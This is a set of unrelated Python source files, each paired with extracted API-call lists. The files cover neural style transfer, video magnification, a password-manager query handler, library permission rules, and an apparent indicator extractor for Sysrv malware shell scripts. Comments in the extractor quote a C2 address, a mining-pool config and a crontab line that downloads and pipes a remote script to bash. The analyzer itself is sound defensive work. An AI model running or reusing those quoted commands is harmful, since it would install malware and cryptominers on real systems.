"""Style transfer network code.
This model does not apply styles in the encoding
layers. Encoding layers (contract) use batch norm as the normalization function.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import lib.model as model_util
import tensorflow.contrib.slim as slim
def transform(input_, normalizer_fn=None, normalizer_params=None,
reuse=False, trainable=True, is_training=True):
"""Maps content images to stylized images.
Args:
input_: Tensor. Batch of input images.
normalizer_fn: normalization layer function for applying style
normalization.
normalizer_params: dict of parameters to pass to the style normalization op.
reuse: bool. Whether to reuse model parameters. Defaults to False.
trainable: bool. Should the parameters be marked as trainable?
is_training: bool. Is it training phase or not?
Returns:
Tensor. The output of the transformer network.
"""
with tf.variable_scope('transformer', reuse=reuse):
with slim.arg_scope(
[slim.conv2d],
activation_fn=tf.nn.relu,
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params,
weights_initializer=tf.random_normal_initializer(0.0, 0.01),
biases_initializer=tf.constant_initializer(0.0),
trainable=trainable):
with slim.arg_scope([slim.conv2d], normalizer_fn=slim.batch_norm,
normalizer_params=None,
trainable=trainable):
with slim.arg_scope([slim.batch_norm], is_training=is_training,
trainable=trainable):
with tf.variable_scope('contract'):
h = model_util.conv2d(input_, 9, 1, 32, 'conv1')
h = model_util.conv2d(h, 3, 2, 64, 'conv2')
h = model_util.conv2d(h, 3, 2, 128, 'conv3')
with tf.variable_scope('residual'):
h = model_util.residual_block(h, 3, 'residual1')
h = model_util.residual_block(h, 3, 'residual2')
h = model_util.residual_block(h, 3, 'residual3')
h = model_util.residual_block(h, 3, 'residual4')
h = model_util.residual_block(h, 3, 'residual5')
with tf.variable_scope('expand'):
h = model_util.upsampling(h, 3, 2, 64, 'conv1')
h = model_util.upsampling(h, 3, 2, 32, 'conv2')
return model_util.upsampling(
h, 9, 1, 3, 'conv3', activation_fn=tf.nn.sigmoid)
def style_normalization_activations(pre_name='transformer',
post_name='StyleNorm'):
"""Returns scope name and depths of the style normalization activations.
Args:
pre_name: string. Prepends this name to the scope names.
post_name: string. Appends this name to the scope names.
Returns:
string. Scope names of the activations of the transformer network which are
used to apply style normalization.
int[]. Depths of the activations of the transformer network which are used
to apply style normalization.
"""
scope_names = ['residual/residual1/conv1',
'residual/residual1/conv2',
'residual/residual2/conv1',
'residual/residual2/conv2',
'residual/residual3/conv1',
'residual/residual3/conv2',
'residual/residual4/conv1',
'residual/residual4/conv2',
'residual/residual5/conv1',
'residual/residual5/conv2',
'expand/conv1/conv',
'expand/conv2/conv',
'expand/conv3/conv']
scope_names = ['{}/{}/{}'.format(pre_name, name, post_name)
for name in scope_names]
depths = [128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 64, 32, 3]
return scope_names, depths
|
[
"tensorflow.contrib.slim.arg_scope",
"lib.model.residual_block",
"tensorflow.constant_initializer",
"tensorflow.variable_scope",
"lib.model.conv2d",
"tensorflow.random_normal_initializer",
"lib.model.upsampling"
] |
[((1697, 1742), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""transformer"""'], {'reuse': 'reuse'}), "('transformer', reuse=reuse)\n", (1714, 1742), True, 'import tensorflow as tf\n'), ((2117, 2226), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[slim.conv2d]'], {'normalizer_fn': 'slim.batch_norm', 'normalizer_params': 'None', 'trainable': 'trainable'}), '([slim.conv2d], normalizer_fn=slim.batch_norm,\n normalizer_params=None, trainable=trainable)\n', (2131, 2226), True, 'import tensorflow.contrib.slim as slim\n'), ((2709, 2738), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""residual"""'], {}), "('residual')\n", (2726, 2738), True, 'import tensorflow as tf\n'), ((2760, 2804), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual1"""'], {}), "(h, 3, 'residual1')\n", (2785, 2804), True, 'import lib.model as model_util\n'), ((2825, 2869), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual2"""'], {}), "(h, 3, 'residual2')\n", (2850, 2869), True, 'import lib.model as model_util\n'), ((2890, 2934), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual3"""'], {}), "(h, 3, 'residual3')\n", (2915, 2934), True, 'import lib.model as model_util\n'), ((2955, 2999), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual4"""'], {}), "(h, 3, 'residual4')\n", (2980, 2999), True, 'import lib.model as model_util\n'), ((3020, 3064), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual5"""'], {}), "(h, 3, 'residual5')\n", (3045, 3064), True, 'import lib.model as model_util\n'), ((3082, 3109), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""expand"""'], {}), "('expand')\n", (3099, 3109), True, 'import tensorflow as tf\n'), ((3131, 3174), 'lib.model.upsampling', 'model_util.upsampling', (['h', '(3)', '(2)', '(64)', '"""conv1"""'], {}), "(h, 3, 2, 64, 'conv1')\n", (3152, 3174), True, 'import lib.model as model_util\n'), ((3195, 3238), 'lib.model.upsampling', 'model_util.upsampling', (['h', '(3)', '(2)', '(32)', '"""conv2"""'], {}), "(h, 3, 2, 32, 'conv2')\n", (3216, 3238), True, 'import lib.model as model_util\n'), ((3262, 3333), 'lib.model.upsampling', 'model_util.upsampling', (['h', '(9)', '(1)', '(3)', '"""conv3"""'], {'activation_fn': 'tf.nn.sigmoid'}), "(h, 9, 1, 3, 'conv3', activation_fn=tf.nn.sigmoid)\n", (3283, 3333), True, 'import lib.model as model_util\n'), ((1960, 1999), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', (['(0.0)', '(0.01)'], {}), '(0.0, 0.01)\n', (1988, 1999), True, 'import tensorflow as tf\n'), ((2032, 2060), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['(0.0)'], {}), '(0.0)\n', (2055, 2060), True, 'import tensorflow as tf\n'), ((2309, 2388), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[slim.batch_norm]'], {'is_training': 'is_training', 'trainable': 'trainable'}), '([slim.batch_norm], is_training=is_training, trainable=trainable)\n', (2323, 2388), True, 'import tensorflow.contrib.slim as slim\n'), ((2451, 2480), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""contract"""'], {}), "('contract')\n", (2468, 2480), True, 'import tensorflow as tf\n'), ((2510, 2554), 'lib.model.conv2d', 'model_util.conv2d', (['input_', '(9)', '(1)', '(32)', '"""conv1"""'], {}), "(input_, 9, 1, 32, 'conv1')\n", (2527, 2554), True, 'import lib.model as model_util\n'), ((2583, 2622), 'lib.model.conv2d', 'model_util.conv2d', (['h', '(3)', '(2)', '(64)', '"""conv2"""'], {}), "(h, 3, 2, 64, 'conv2')\n", (2600, 2622), True, 'import lib.model as model_util\n'), ((2651, 2691), 'lib.model.conv2d', 'model_util.conv2d', (['h', '(3)', '(2)', '(128)', '"""conv3"""'], {}), "(h, 3, 2, 128, 'conv3')\n", (2668, 2691), True, 'import lib.model as model_util\n')]
|
import cv2
import numpy as np
import scipy.fftpack
import scipy.signal
from matplotlib import pyplot
# from eulerian_magnification.io import play_vid_data
from eulerian_magnification.pyramid import create_laplacian_video_pyramid, collapse_laplacian_video_pyramid
from eulerian_magnification.transforms import temporal_bandpass_filter
def eulerian_magnification(vid_data, fps, freq_min, freq_max, amplification, pyramid_levels=4, skip_levels_at_top=2):
vid_pyramid = create_laplacian_video_pyramid(vid_data, pyramid_levels=pyramid_levels)
for i, vid in enumerate(vid_pyramid):
if i < skip_levels_at_top or i >= len(vid_pyramid) - 1:
# ignore the top and bottom of the pyramid. One end has too much noise and the other end is the
# gaussian representation
continue
bandpassed = temporal_bandpass_filter(vid, fps, freq_min=freq_min, freq_max=freq_max, amplification_factor=amplification)
# play_vid_data(bandpassed)
vid_pyramid[i] += bandpassed
# play_vid_data(vid_pyramid[i])
vid_data = collapse_laplacian_video_pyramid(vid_pyramid)
return vid_data
def show_frequencies(vid_data, fps, bounds=None):
"""Graph the average value of the video as well as the frequency strength"""
averages = []
if bounds:
for x in range(1, vid_data.shape[0] - 1):
averages.append(vid_data[x, bounds[2]:bounds[3], bounds[0]:bounds[1], :].sum())
else:
for x in range(1, vid_data.shape[0] - 1):
averages.append(vid_data[x, :, :, :].sum())
averages = averages - min(averages)
charts_x = 1
charts_y = 2
pyplot.figure(figsize=(20, 10))
pyplot.subplots_adjust(hspace=.7)
pyplot.subplot(charts_y, charts_x, 1)
pyplot.title("Pixel Average")
pyplot.xlabel("Time")
pyplot.ylabel("Brightness")
pyplot.plot(averages)
freqs = scipy.fftpack.fftfreq(len(averages), d=1.0 / fps)
fft = abs(scipy.fftpack.fft(averages))
idx = np.argsort(freqs)
pyplot.subplot(charts_y, charts_x, 2)
pyplot.title("FFT")
pyplot.xlabel("Freq (Hz)")
freqs = freqs[idx]
fft = fft[idx]
freqs = freqs[len(freqs) // 2 + 1:]
fft = fft[len(fft) // 2 + 1:]
pyplot.plot(freqs, abs(fft))
pyplot.show()
def gaussian_video(video, shrink_multiple):
"""Create a gaussian representation of a video"""
vid_data = None
for x in range(0, video.shape[0]):
frame = video[x]
gauss_copy = np.ndarray(shape=frame.shape, dtype="float")
gauss_copy[:] = frame
for i in range(shrink_multiple):
gauss_copy = cv2.pyrDown(gauss_copy)
if x == 0:
vid_data = np.zeros((video.shape[0], gauss_copy.shape[0], gauss_copy.shape[1], 3))
vid_data[x] = gauss_copy
return vid_data
def laplacian_video(video, shrink_multiple):
vid_data = None
frame_count, height, width, colors = video.shape
for i, frame in enumerate(video):
gauss_copy = np.ndarray(shape=frame.shape, dtype="float")
gauss_copy[:] = frame
for _ in range(shrink_multiple):
prev_copy = gauss_copy[:]
gauss_copy = cv2.pyrDown(gauss_copy)
laplacian = prev_copy - cv2.pyrUp(gauss_copy)
if vid_data is None:
vid_data = np.zeros((frame_count, laplacian.shape[0], laplacian.shape[1], 3))
vid_data[i] = laplacian
return vid_data
def combine_pyramid_and_save(g_video, orig_video, enlarge_multiple, fps, save_filename='media/output.avi'):
"""Combine a gaussian video representation with the original and save to file"""
width, height = get_frame_dimensions(orig_video[0])
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
print("Outputting to %s" % save_filename)
writer = cv2.VideoWriter(save_filename, fourcc, fps, (width, height), 1)
for x in range(0, g_video.shape[0]):
img = np.ndarray(shape=g_video[x].shape, dtype='float')
img[:] = g_video[x]
for i in range(enlarge_multiple):
img = cv2.pyrUp(img)
img[:height, :width] = img[:height, :width] + orig_video[x]
res = cv2.convertScaleAbs(img[:height, :width])
writer.write(res)
def get_frame_dimensions(frame):
"""Get the dimensions of a single frame"""
height, width = frame.shape[:2]
return width, height
def butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = scipy.signal.butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5):
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
y = scipy.signal.lfilter(b, a, data, axis=0)
return y
|
[
"matplotlib.pyplot.title",
"cv2.VideoWriter_fourcc",
"eulerian_magnification.pyramid.create_laplacian_video_pyramid",
"numpy.argsort",
"matplotlib.pyplot.figure",
"cv2.VideoWriter",
"cv2.pyrDown",
"numpy.ndarray",
"cv2.convertScaleAbs",
"matplotlib.pyplot.show",
"eulerian_magnification.transforms.temporal_bandpass_filter",
"matplotlib.pyplot.subplots_adjust",
"matplotlib.pyplot.ylabel",
"eulerian_magnification.pyramid.collapse_laplacian_video_pyramid",
"cv2.pyrUp",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.plot",
"numpy.zeros",
"matplotlib.pyplot.xlabel"
] |
[((473, 544), 'eulerian_magnification.pyramid.create_laplacian_video_pyramid', 'create_laplacian_video_pyramid', (['vid_data'], {'pyramid_levels': 'pyramid_levels'}), '(vid_data, pyramid_levels=pyramid_levels)\n', (503, 544), False, 'from eulerian_magnification.pyramid import create_laplacian_video_pyramid, collapse_laplacian_video_pyramid\n'), ((1080, 1125), 'eulerian_magnification.pyramid.collapse_laplacian_video_pyramid', 'collapse_laplacian_video_pyramid', (['vid_pyramid'], {}), '(vid_pyramid)\n', (1112, 1125), False, 'from eulerian_magnification.pyramid import create_laplacian_video_pyramid, collapse_laplacian_video_pyramid\n'), ((1651, 1682), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (1664, 1682), False, 'from matplotlib import pyplot\n'), ((1687, 1721), 'matplotlib.pyplot.subplots_adjust', 'pyplot.subplots_adjust', ([], {'hspace': '(0.7)'}), '(hspace=0.7)\n', (1709, 1721), False, 'from matplotlib import pyplot\n'), ((1726, 1763), 'matplotlib.pyplot.subplot', 'pyplot.subplot', (['charts_y', 'charts_x', '(1)'], {}), '(charts_y, charts_x, 1)\n', (1740, 1763), False, 'from matplotlib import pyplot\n'), ((1768, 1797), 'matplotlib.pyplot.title', 'pyplot.title', (['"""Pixel Average"""'], {}), "('Pixel Average')\n", (1780, 1797), False, 'from matplotlib import pyplot\n'), ((1802, 1823), 'matplotlib.pyplot.xlabel', 'pyplot.xlabel', (['"""Time"""'], {}), "('Time')\n", (1815, 1823), False, 'from matplotlib import pyplot\n'), ((1828, 1855), 'matplotlib.pyplot.ylabel', 'pyplot.ylabel', (['"""Brightness"""'], {}), "('Brightness')\n", (1841, 1855), False, 'from matplotlib import pyplot\n'), ((1860, 1881), 'matplotlib.pyplot.plot', 'pyplot.plot', (['averages'], {}), '(averages)\n', (1871, 1881), False, 'from matplotlib import pyplot\n'), ((1998, 2015), 'numpy.argsort', 'np.argsort', (['freqs'], {}), '(freqs)\n', (2008, 2015), True, 'import numpy as np\n'), ((2021, 2058), 'matplotlib.pyplot.subplot', 'pyplot.subplot', (['charts_y', 'charts_x', '(2)'], {}), '(charts_y, charts_x, 2)\n', (2035, 2058), False, 'from matplotlib import pyplot\n'), ((2063, 2082), 'matplotlib.pyplot.title', 'pyplot.title', (['"""FFT"""'], {}), "('FFT')\n", (2075, 2082), False, 'from matplotlib import pyplot\n'), ((2087, 2113), 'matplotlib.pyplot.xlabel', 'pyplot.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (2100, 2113), False, 'from matplotlib import pyplot\n'), ((2269, 2282), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (2280, 2282), False, 'from matplotlib import pyplot\n'), ((3696, 3727), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'MJPG'"], {}), "(*'MJPG')\n", (3718, 3727), False, 'import cv2\n'), ((3787, 3850), 'cv2.VideoWriter', 'cv2.VideoWriter', (['save_filename', 'fourcc', 'fps', '(width, height)', '(1)'], {}), '(save_filename, fourcc, fps, (width, height), 1)\n', (3802, 3850), False, 'import cv2\n'), ((840, 952), 'eulerian_magnification.transforms.temporal_bandpass_filter', 'temporal_bandpass_filter', (['vid', 'fps'], {'freq_min': 'freq_min', 'freq_max': 'freq_max', 'amplification_factor': 'amplification'}), '(vid, fps, freq_min=freq_min, freq_max=freq_max,\n amplification_factor=amplification)\n', (864, 952), False, 'from eulerian_magnification.transforms import temporal_bandpass_filter\n'), ((2488, 2532), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'frame.shape', 'dtype': '"""float"""'}), "(shape=frame.shape, dtype='float')\n", (2498, 2532), True, 'import numpy as np\n'), ((3001, 3045), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'frame.shape', 'dtype': '"""float"""'}), "(shape=frame.shape, dtype='float')\n", (3011, 3045), True, 'import numpy as np\n'), ((3906, 3955), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'g_video[x].shape', 'dtype': '"""float"""'}), "(shape=g_video[x].shape, dtype='float')\n", (3916, 3955), True, 'import numpy as np\n'), ((4142, 4183), 'cv2.convertScaleAbs', 'cv2.convertScaleAbs', (['img[:height, :width]'], {}), '(img[:height, :width])\n', (4161, 4183), False, 'import cv2\n'), ((2629, 2652), 'cv2.pyrDown', 'cv2.pyrDown', (['gauss_copy'], {}), '(gauss_copy)\n', (2640, 2652), False, 'import cv2\n'), ((2696, 2767), 'numpy.zeros', 'np.zeros', (['(video.shape[0], gauss_copy.shape[0], gauss_copy.shape[1], 3)'], {}), '((video.shape[0], gauss_copy.shape[0], gauss_copy.shape[1], 3))\n', (2704, 2767), True, 'import numpy as np\n'), ((3181, 3204), 'cv2.pyrDown', 'cv2.pyrDown', (['gauss_copy'], {}), '(gauss_copy)\n', (3192, 3204), False, 'import cv2\n'), ((3238, 3259), 'cv2.pyrUp', 'cv2.pyrUp', (['gauss_copy'], {}), '(gauss_copy)\n', (3247, 3259), False, 'import cv2\n'), ((3313, 3379), 'numpy.zeros', 'np.zeros', (['(frame_count, laplacian.shape[0], laplacian.shape[1], 3)'], {}), '((frame_count, laplacian.shape[0], laplacian.shape[1], 3))\n', (3321, 3379), True, 'import numpy as np\n'), ((4044, 4058), 'cv2.pyrUp', 'cv2.pyrUp', (['img'], {}), '(img)\n', (4053, 4058), False, 'import cv2\n')]
|
from constants.database import PASSWORD_MANAGER_COLLECTION_NAME, PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD, PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD, PASSWORD_MANAGER_COLLECTION_SECRETS_FIELD
from constants.request_parameters import BODY_DOMAIN_PARAM, BODY_USERNAME_PARAM, BODY_SECRET_PARAM, BODY_MASTER_PASSWORD_PARAM, BODY_QUERY_TYPE_PARAM, BODY_MASTER_KEY_PARAM, QUERY_SEARCH_BY_DOMAIN_AND_USERNAME_TYPE, QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE
from constants.response_messages import ERROR_MULTIPLE_RECORDS_FOUND_FOR_DECRYPTING_SECRETS, ERROR_NO_RECORD_FOUND
from crypto.decrypter import Decrypter
class QueryProcessor:
"""A wrapper class for processing query requests
Attributes:
collection (Collection): The password manager collection object.
domain (str): The domain for the record.
username (str): The username for the record.
decrypter (Decrypter): The Decrypter object to decrypt the secrets. Only initialized if query type is QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE.
query_type (str): The type of query.
"""
collection = None
domain = None
username = None
decrypter = None
query_type = None
def __init__(self, request, dbclient):
"""
Args:
request (Request): The flask request object received from the client.
dbclient (DbClient): The database client object.
"""
self.collection = dbclient.get_collection(
PASSWORD_MANAGER_COLLECTION_NAME)
self.query_type = request.form.get(BODY_QUERY_TYPE_PARAM)
if self.query_type == QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE:
master_password = request.form.get(BODY_MASTER_PASSWORD_PARAM)
master_key = int(request.form.get(BODY_MASTER_KEY_PARAM))
self.decrypter = Decrypter(master_password, master_key)
self.domain = request.form.get(BODY_DOMAIN_PARAM)
self.username = request.form.get(BODY_USERNAME_PARAM)
def process(self):
"""Queries the password manager collection.
If query type is QUERY_SEARCH_BY_DOMAIN_AND_USERNAME_TYPE, it filters the records by domain (and username).
If query type is QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE, it decrypts the secrets and returns them if and only if a single record is found for requested domain (and username).
"""
if self.query_type == QUERY_SEARCH_BY_DOMAIN_AND_USERNAME_TYPE:
cursor = self.collection.find()
return self.__filter_by_domain_and_username(cursor)
elif self.query_type == QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE:
cursor = None
if self.username == None:
cursor = self.collection.find({
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: self.domain
})
else:
cursor = self.collection.find({
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: self.domain,
PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD: self.username
})
if cursor.count() > 1:
raise Exception(
ERROR_MULTIPLE_RECORDS_FOUND_FOR_DECRYPTING_SECRETS)
elif cursor.count() == 0:
raise Exception(ERROR_NO_RECORD_FOUND)
else:
record = cursor.next()
return {
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: record[PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD],
PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD: record[PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD],
PASSWORD_MANAGER_COLLECTION_SECRETS_FIELD: self.__decrypt_secrets(
record[PASSWORD_MANAGER_COLLECTION_SECRETS_FIELD])
}
def __filter_by_domain_and_username(self, cursor):
"""Filters the cursor by domain (and username if specified in request).
For a match, the lowercase of paramater in request must be a substring of the corresponding field in collection.
Args:
cursor (Cursor): The cursor object which is a result of find()/find_one() on a collection object.
Returns:
list: A list of filtered objects having domain and username.
"""
result = []
for _ in range(cursor.count()):
record = cursor.next()
domain = record[PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD]
username = record[PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD]
if self.domain.lower() in domain.lower():
if self.username != None:
if self.username.lower() in username.lower():
result.append({
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: domain,
PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD: username
})
else:
result.append({
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: domain,
PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD: username
})
return result
def __decrypt_secrets(self, secrets):
"""Decrypts all the secrets in a list.
Args:
secrets (list): List of encrypted secrets to decrypt.
Returns:
list: List of corresponding decrypted secrets.
"""
assert self.decrypter != None
return [self.decrypter.decrypt(secret) for secret in secrets]
|
[
"crypto.decrypter.Decrypter"
] |
[((1833, 1871), 'crypto.decrypter.Decrypter', 'Decrypter', (['master_password', 'master_key'], {}), '(master_password, master_key)\n', (1842, 1871), False, 'from crypto.decrypter import Decrypter\n')]
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2018 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Ils permissions."""
from __future__ import absolute_import, print_function
from functools import wraps
from flask import abort, current_app
from flask_login import current_user
from flask_principal import UserNeed
from invenio_access import action_factory
from invenio_access.permissions import Permission, authenticated_user
from invenio_records_rest.utils import allow_all, deny_all
from invenio_app_ils.proxies import current_app_ils
backoffice_access_action = action_factory("ils-backoffice-access")
def need_permissions(action):
"""View decorator to check permissions for the given action or abort.
:param action: The action needed.
"""
def decorator_builder(f):
@wraps(f)
def decorate(*args, **kwargs):
check_permission(
current_app.config["ILS_VIEWS_PERMISSIONS_FACTORY"](action)
)
return f(*args, **kwargs)
return decorate
return decorator_builder
def check_permission(permission):
"""Abort if permission is not allowed.
:param permission: The permission to check.
"""
if permission is not None and not permission.can():
if not current_user.is_authenticated:
abort(401)
abort(403)
def backoffice_permission(*args, **kwargs):
"""Return permission to allow only librarians and admins."""
return Permission(backoffice_access_action)
def file_download_permission(obj):
"""File download permissions."""
bucket_id = str(obj.bucket_id)
search_cls = current_app_ils.eitem_search_cls
results = search_cls().search_by_bucket_id(bucket_id)
if len(results) != 1:
return deny_all()
eitem_cls = current_app_ils.eitem_record_cls
record = eitem_cls.get_record_by_pid(results[0].pid)
if record.get("open_access", False):
return allow_all()
return authenticated_user_permission()
def files_permission(obj, action=None):
"""Return permission for Files REST."""
if action == "object-read":
return file_download_permission(obj)
return backoffice_permission()
class LoanOwnerPermission(Permission):
"""Return Permission to evaluate if the current user owns the loan."""
def __init__(self, record):
"""Constructor."""
super(LoanOwnerPermission, self).__init__(
UserNeed(int(record["patron_pid"])), backoffice_access_action
)
class DocumentRequestOwnerPermission(Permission):
"""Return Permission to evaluate if the current user owns the request."""
def __init__(self, record):
"""Constructor."""
super(DocumentRequestOwnerPermission, self).__init__(
UserNeed(int(record["patron_pid"])), backoffice_access_action
)
def authenticated_user_permission(*args, **kwargs):
"""Return an object that evaluates if the current user is authenticated."""
return Permission(authenticated_user)
def views_permissions_factory(action):
"""Return ILS views permissions factory."""
if action == "circulation-loan-request":
return authenticated_user_permission()
elif action == "circulation-loan-checkout":
return backoffice_permission()
elif action == "circulation-loan-force-checkout":
return backoffice_permission()
elif action == "circulation-overdue-loan-email":
return backoffice_permission()
elif action == "relations-create":
return backoffice_permission()
elif action == "relations-delete":
return backoffice_permission()
elif action == "stats-most-loaned":
return backoffice_permission()
elif action == "document-request-accept":
return backoffice_permission()
elif action == "document-request-pending":
return backoffice_permission()
elif action == "document-request-reject":
return backoffice_permission()
elif action == "bucket-create":
return backoffice_permission()
else:
return deny_all()
def circulation_permission(patron_pid):
"""Return circulation status permission for a patron."""
return Permission(UserNeed(int(patron_pid)), backoffice_access_action)
|
[
"flask.abort",
"functools.wraps",
"invenio_access.action_factory",
"invenio_access.permissions.Permission",
"invenio_records_rest.utils.deny_all",
"invenio_records_rest.utils.allow_all"
] |
[((678, 717), 'invenio_access.action_factory', 'action_factory', (['"""ils-backoffice-access"""'], {}), "('ils-backoffice-access')\n", (692, 717), False, 'from invenio_access import action_factory\n'), ((1573, 1609), 'invenio_access.permissions.Permission', 'Permission', (['backoffice_access_action'], {}), '(backoffice_access_action)\n', (1583, 1609), False, 'from invenio_access.permissions import Permission, authenticated_user\n'), ((3087, 3117), 'invenio_access.permissions.Permission', 'Permission', (['authenticated_user'], {}), '(authenticated_user)\n', (3097, 3117), False, 'from invenio_access.permissions import Permission, authenticated_user\n'), ((910, 918), 'functools.wraps', 'wraps', (['f'], {}), '(f)\n', (915, 918), False, 'from functools import wraps\n'), ((1440, 1450), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (1445, 1450), False, 'from flask import abort, current_app\n'), ((1868, 1878), 'invenio_records_rest.utils.deny_all', 'deny_all', ([], {}), '()\n', (1876, 1878), False, 'from invenio_records_rest.utils import allow_all, deny_all\n'), ((2042, 2053), 'invenio_records_rest.utils.allow_all', 'allow_all', ([], {}), '()\n', (2051, 2053), False, 'from invenio_records_rest.utils import allow_all, deny_all\n'), ((1421, 1431), 'flask.abort', 'abort', (['(401)'], {}), '(401)\n', (1426, 1431), False, 'from flask import abort, current_app\n'), ((4162, 4172), 'invenio_records_rest.utils.deny_all', 'deny_all', ([], {}), '()\n', (4170, 4172), False, 'from invenio_records_rest.utils import allow_all, deny_all\n')]
|
import os
import inspect
from mishell.shell_family import Alpha
class sysrv_sh(Alpha):
NAME = "sysrv_sh"
def __init__(self):
super(sysrv_sh, self).__init__()
self.anchor_processor = {}
self.file_abs_path = None
self.lines = []
self._inspect_anchor_processor()
self.cache = {}
def _read_file(self, file_abs_path):
self.file_abs_path = file_abs_path
with open(file_abs_path, "r") as f:
self.lines = f.readlines()
def do(self, data, *args, **kwargs):
for file_abs_path, anchor_lst in data.items():
md5 = os.path.basename(file_abs_path)
self._read_file(file_abs_path)
self._find_anchor_processor(anchor_lst, md5)
def get_process_result(self):
pass
def _find_anchor_processor(self, anchor_dct, md5):
print("Processing md5 {}".format(md5))
for anchor, value in anchor_dct.items():
func = self.anchor_processor.get(anchor, None)
if func is not None:
func(anchor, value)
def _inspect_anchor_processor(self):
for name, data in inspect.getmembers(self):
if name.startswith("anchor") and inspect.ismethod(data):
self.anchor_processor[name] = data
# cc=http://185.239.242.71
def anchor_cc(self, anchor, value):
for line in self.lines:
line = line.strip()
if line.startswith(value):
try:
url = line.split("=")[1]
print(url)
except Exception as e:
return
# {"url": "pool.minexmr.com:5555", "user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxP<KEY>"},
# {"url": "xmr.f2pool.com:13531", "user": "<KEY>", "pass": "x"}
def anchor_config(self, anchor, value):
for line in self.lines:
line = line.strip()
if line.startswith(value):
try:
import json
line = line.strip(",")
raw = json.loads(line)
url = raw["url"]
ip = url.split(":")[0]
port = url.split(":")[1]
wallet = raw["user"]
print(ip, port, wallet)
except Exception as e:
return
# echo "*/9 * * * * (curl -fsSL $cc/ldr.sh || wget -q -O - $cc/ldr.sh) | bash > /dev/null 2>&1" | crontab -
def anchor_persistent(self, anchor, value):
for line in self.lines:
line = line.strip()
url = ""
if line.startswith(value):
try:
lst = line.split(" ")
for item in lst:
if item.startswith("$cc"):
for line in self.lines:
if line.startswith("cc="):
line = line.strip()
part1 = line.split("=")[1]
url = part1 + "/" + item.split("/")[1]
url = url.replace(")", "")
print(url)
break
except Exception as e:
return
# get $cc/sysrr $sys; nohup ./$sys 1>/dev/null 2>&1 &
def anchor_get(self, anchor, value):
for line in self.lines:
line = line.strip()
url = ""
if line.startswith(value):
try:
lst = line.split(" ")
for item in lst:
if item.startswith("$cc"):
for line in self.lines:
if line.startswith("cc="):
line = line.strip()
part1 = line.split("=")[1]
url = part1 + "/" + item.split("/")[1]
url = url.replace("\"", "")
print(url)
break
except Exception as e:
return
# get "$cc/sysrv" $sys
def anchor_get_1(self, anchor, value):
for line in self.lines:
line = line.strip()
url = ""
if line.startswith(value):
try:
lst = line.split(" ")
for item in lst:
if item.startswith("\"$cc"):
for line in self.lines:
if line.startswith("cc="):
line = line.strip()
part1 = line.split("=")[1]
item = item.split("\"")[1]
url = part1 + "/" + item.split("/")[1]
url = url.replace("\"", "")
print(url)
break
except Exception as e:
return
|
[
"os.path.basename",
"inspect.ismethod",
"json.loads",
"inspect.getmembers"
] |
[((1148, 1172), 'inspect.getmembers', 'inspect.getmembers', (['self'], {}), '(self)\n', (1166, 1172), False, 'import inspect\n'), ((620, 651), 'os.path.basename', 'os.path.basename', (['file_abs_path'], {}), '(file_abs_path)\n', (636, 651), False, 'import os\n'), ((1219, 1241), 'inspect.ismethod', 'inspect.ismethod', (['data'], {}), '(data)\n', (1235, 1241), False, 'import inspect\n'), ((2102, 2118), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (2112, 2118), False, 'import json\n')]
|
#!/usr/bin/env python
